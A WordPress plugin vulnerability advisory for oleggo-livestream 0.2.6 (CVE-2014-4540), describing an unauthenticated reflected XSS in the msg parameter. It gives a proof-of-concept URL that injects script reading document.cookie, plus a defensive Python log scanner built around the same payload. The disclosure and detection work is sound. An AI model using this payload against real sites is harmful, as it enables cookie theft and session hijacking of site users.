wp-plugin : oleggo-livestream

Plugin Details
Plugin Name: wp-plugin : oleggo-livestream
Affected Version : 0.2.6 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC: http://localhost/wordpress/wp-content/wp-plugs/oleggolivestream/oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : msg
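
A log check for this issue, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to `twitter_login_form.php` whose `msg` value decodes to HTML metacharacters. The log entries are constructed samples, and the combined log format and the helper names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script and parameter named in this advisory.
TARGET_SCRIPT = "twitter_login_form.php"
TARGET_PARAM = "msg"
# Characters that let a reflected value leave an HTML attribute or text node.
HTML_META = re.compile(r"[<>'\"]")
# Request line of an access-log entry (combined log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_msg_values(log_line):
    """Return decoded msg values that carry HTML metacharacters, else []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + TARGET_SCRIPT):
        return []
    values = parse_qs(url.query, keep_blank_values=True).get(TARGET_PARAM, [])
    return [d for d in map(fully_decode, values) if HTML_META.search(d)]

def scan(lines):
    """Return indexes of log lines that should be reviewed."""
    return [i for i, line in enumerate(lines) if suspicious_msg_values(line)]

def entry(uri):
    # Constructed log entry; client address and timestamp are placeholders.
    return f'192.0.2.10 - - [01/Jan/2014:00:00:00 +0000] "GET {uri} HTTP/1.1" 200 512'

FORM_URI = "/wordpress/wp-content/wp-plugs/oleggolivestream/oleggo-twitter/" + TARGET_SCRIPT
SAMPLE_LOG = [
    entry(FORM_URI + "?msg=Login+failed"),            # benign message
    entry(FORM_URI + "?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"),
    entry(FORM_URI + "?msg=x%2527%253E"),             # double-encoded value
    entry("/wordpress/index.php?msg=%3Cb%3E"),        # different script, ignored
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(i, suspicious_msg_values(SAMPLE_LOG[i]))
```

A legitimate message containing an apostrophe is flagged as well, so hits are candidates for review rather than confirmed attempts.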


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4540
Plugin Description :
Oleggo LiveStream is a WordPress plugin that integrates video streaming, Twitter and Facebook to improve your streaming events. Oleggo LiveStream can manage video streaming (from YouTube, Vimeo, Ustream or whatever you want), plus you can add Twitter hashtag search and Facebook live streaming. Using these services you can create a great livestreaming event page.